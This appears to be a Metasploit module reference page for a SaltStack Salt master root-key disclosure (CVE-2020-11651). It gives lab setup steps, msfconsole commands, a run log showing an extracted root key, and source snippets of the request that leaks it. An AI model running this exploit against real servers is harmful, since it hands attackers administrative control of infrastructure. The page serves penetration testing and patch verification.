SaltStack Salt Master Server Root Key Disclosure - Metasploit
This page contains detailed information about how to use the auxiliary/gather/saltstack_salt_root_key metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SaltStack Salt Master Server Root Key Disclosure
Module: auxiliary/gather/saltstack_salt_root_key
Source code: modules/auxiliary/gather/saltstack_salt_root_key.rb
Disclosure date: 2020-04-30
Last modification time: 2021-04-30 23:26:18 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 4506
List of CVEs: CVE-2020-11651, CVE-2020-11652
This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/saltstack_salt_root_key
msf auxiliary(saltstack_salt_root_key) > show targets
... a list of targets ...
msf auxiliary(saltstack_salt_root_key) > set TARGET target-id
msf auxiliary(saltstack_salt_root_key) > show options
... show and set options ...
msf auxiliary(saltstack_salt_root_key) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module exploits unauthenticated access to the _prep_auth_info()
method in the SaltStack Salt master's ZeroMQ request server, for
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
root key used to authenticate administrative commands to the master.
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities.
Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.
Setup
Note: I did the bulk of my testing after manually installing Salt in an Ubuntu 18.04 VM, but the Docker image from Vulhub may be quicker. YMMV.
Using a virtual machine
- Set up an Ubuntu 18.04 VM
- Browse to SaltStack's instructions for Ubuntu
- Select
Pin to Minor Release
and change all versions to either 2019.2.3 or 3000.1, depending on the version you wish to test - Follow the instructions, installing only the
salt-master
andsalt-minion
packages necessary for testing - Follow the post-installation configuration
You may now begin testing.
Using Docker
Prerequisites: Docker and Docker Compose must be installed first.
Note: The Salt master is already configured and running in the following scenario. The majority of the steps below are for configuring and starting the minion. Version 2019.2.3 will be used.
- Run
git clone https://github.com/vulhub/vulhub
- Run
cd vulhub/saltstack/CVE-2020-11651
- Run
docker-compose up -d
to start the container in the background - Run
docker exec -it cve-2020-11651_saltstack_1 bash
to drop to a root shell inside the container - Run
echo $'127.0.0.1\tsalt' >> /etc/hosts
to add the master to/etc/hosts
(this allows the minion to find the master) - Run
salt-minion -d
to execute the minion in the background - Run
salt-key -A
and accept the key for the minion
You may now begin testing.
Verification Steps
Actions
Dump
This dumps the Salt master's root key by sending the _prep_auth_info()
method and extracting the key from the resulting serialized auth info.
Scenarios
SaltStack Salt 2019.2.3 on Ubuntu 18.04
msf5 > use auxiliary/gather/saltstack_salt_root_key
msf5 auxiliary(gather/saltstack_salt_root_key) > options
Module options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 4506 yes The target port (TCP)
Auxiliary action:
Name Description
---- -----------
Dump Dump root key from Salt master
msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5
rhosts => 172.28.128.5
msf5 auxiliary(gather/saltstack_salt_root_key) > run
[*] Running module against 172.28.128.5
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
[+] 172.28.128.5:4506 - Received serialized auth info
[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
[*] Auxiliary module execution completed
msf5 auxiliary(gather/saltstack_salt_root_key) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.28.128.5 172.28.128.5 4506/tcp (salt/zeromq) root bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= Password
msf5 auxiliary(gather/saltstack_salt_root_key) >
Go back to menu.
Msfconsole Usage
Here is how the gather/saltstack_salt_root_key auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/saltstack_salt_root_key
msf6 auxiliary(gather/saltstack_salt_root_key) > show info
Name: SaltStack Salt Master Server Root Key Disclosure
Module: auxiliary/gather/saltstack_salt_root_key
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-04-30
Provided by:
F-Secure
wvu <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Available actions:
Name Description
---- -----------
Dump Dump root key from Salt master
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4506 yes The target port (TCP)
Description:
This module exploits unauthenticated access to the _prep_auth_info()
method in the SaltStack Salt master's ZeroMQ request server, for
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose
the root key used to authenticate administrative commands to the
master. VMware vRealize Operations Manager versions 7.5.0 through
8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and
Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for
versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known
to be affected by the Salt vulnerabilities. Tested against SaltStack
Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker
image.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-11651
https://nvd.nist.gov/vuln/detail/CVE-2020-11652
https://labs.f-secure.com/advisories/saltstack-authorization-bypass
https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
https://www.vmware.com/security/advisories/VMSA-2020-0009.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py
Module Options
This is a complete list of options available in the gather/saltstack_salt_root_key auxiliary module:
msf6 auxiliary(gather/saltstack_salt_root_key) > show options
Module options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4506 yes The target port (TCP)
Auxiliary action:
Name Description
---- -----------
Dump Dump root key from Salt master
Advanced Options
Here is a complete list of advanced options supported by the gather/saltstack_salt_root_key auxiliary module:
msf6 auxiliary(gather/saltstack_salt_root_key) > show advanced
Module advanced options (auxiliary/gather/saltstack_salt_root_key):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/saltstack_salt_root_key module can do:
msf6 auxiliary(gather/saltstack_salt_root_key) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump Dump root key from Salt master
Evasion Options
Here is the full list of possible evasion options supported by the gather/saltstack_salt_root_key auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/saltstack_salt_root_key) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Could not find root key in serialized auth info
Here is a relevant code snippet related to the "Could not find root key in serialized auth info" error message:
63: # These are from Msf::Exploit::Remote::ZeroMQ
64: zmq_connect
65: zmq_negotiate
66:
67: unless (root_key = extract_root_key(yeet_prep_auth_info))
68: print_error('Could not find root key in serialized auth info')
69:
70: # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
71: return Exploit::CheckCode::Safe
72: end
73:
Did not receive auth info
Here is a relevant code snippet related to the "Did not receive auth info" error message:
101: print_status("Yeeting _prep_auth_info() at #{peer}")
102:
103: zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))
104:
105: unless (res = sock.get_once)
106: fail_with(Failure::Unknown, 'Did not receive auth info')
107: end
108:
109: unless res.match(/user.+UserAuthenticationError.+root/m)
110: fail_with(Failure::UnexpectedReply,
111: "Did not receive serialized auth info: #{res.inspect}")
<__METHOD__> failed: <E.MESSAGE>
Here is a relevant code snippet related to the "<__METHOD__> failed: <E.MESSAGE>" error message:
118: end
119:
120: def extract_root_key(auth_info)
121: # Fetch root key from appropriate index of deserialized data, presumably
122: MessagePack.unpack(auth_info)[2]&.fetch('root')
123: rescue EOFError, KeyError, MessagePack::MalformedFormatError => e
124: print_error("#{__method__} failed: #{e.message}")
125: nil
126: end
127:
128: end
Go back to menu.
Related Pull Requests
- #15126 Merged Pull Request: Fix errors in auxiliary/gather/saltstack_salt_root_key and exploit/linux/http/axis_srv_parhand_rce
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13538 Merged Pull Request: Add Cisco CML and VIRL-PE advisory to Salt modules
- #13401 Merged Pull Request: Add SaltStack Salt root key disclosure (CVE-2020-11651), unauthenticated RCE (also CVE-2020-11651), and basic ZeroMQ library
References
- CVE-2020-11651
- CVE-2020-11652
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
- https://www.vmware.com/security/advisories/VMSA-2020-0009.html
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
- https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py
See Also
Check also the following modules related to this module:
- exploit/linux/misc/saltstack_salt_unauth_rce
- exploit/linux/http/saltstack_salt_api_cmd_exec
- exploit/linux/http/saltstack_salt_wheel_async_rce
- post/multi/gather/saltstack_salt
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/admin/http/typo3_winstaller_default_enc_keys
- auxiliary/scanner/etcd/open_key_scanner
- auxiliary/scanner/ssh/ssh_enum_git_keys
- auxiliary/server/capture/http_javascript_keylogger
- exploit/freebsd/telnet/telnet_encrypt_keyid
- exploit/linux/local/sophos_wpa_clear_keys
- exploit/linux/telnet/telnet_encrypt_keyid
- exploit/multi/http/metasploit_static_secret_key_base
- exploit/multi/vnc/vnc_keyboard_exec
- exploit/osx/local/iokit_keyboard_root
- exploit/unix/x11/x11_keyboard_exec
- exploit/windows/browser/keyhelp_launchtripane_exec
- exploit/windows/browser/ms06_067_keyframe
- exploit/windows/fileformat/emc_appextender_keyworks
- exploit/windows/ldap/pgp_keyserver7
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_key_exchange
- post/linux/gather/gnome_keyring_dump
- post/multi/gather/aws_keys
- post/multi/gather/rubygems_api_key
- post/osx/capture/keylog_recorder
- post/osx/gather/enum_keychain
- post/windows/capture/keylog_recorder
- post/windows/capture/lockout_keylogger
- post/windows/gather/enum_ms_product_keys
- post/windows/manage/sticky_keys
Related Nessus plugins:
- SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)
- SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)
- openSUSE Security Update : salt (openSUSE-2020-564)
- Debian DSA-4676-1 : salt - security update
- SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities
- SaltStack < 2019.2.4 / 3000.x < 3000.2 Authentication Bypass (CVE-2020-11651)
- FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)
- Photon OS 1.0: Salt PHSA-2020-1.0-0294
- Photon OS 1.0: Salt3 PHSA-2020-1.0-0294
- Photon OS 3.0: Salt3 PHSA-2020-3.0-0091
Authors
- F-Secure
- wvu
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.